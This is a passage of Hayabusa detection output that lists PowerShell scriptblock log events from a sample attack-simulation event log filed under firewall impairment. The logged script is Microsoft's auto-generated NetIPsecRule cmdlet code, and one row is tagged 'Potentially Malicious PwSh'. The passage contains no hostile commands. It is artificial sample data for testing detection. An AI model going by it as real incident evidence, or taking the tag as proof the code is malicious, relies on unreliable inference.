$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirew",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"allInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) 
$__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contai",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"allInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) 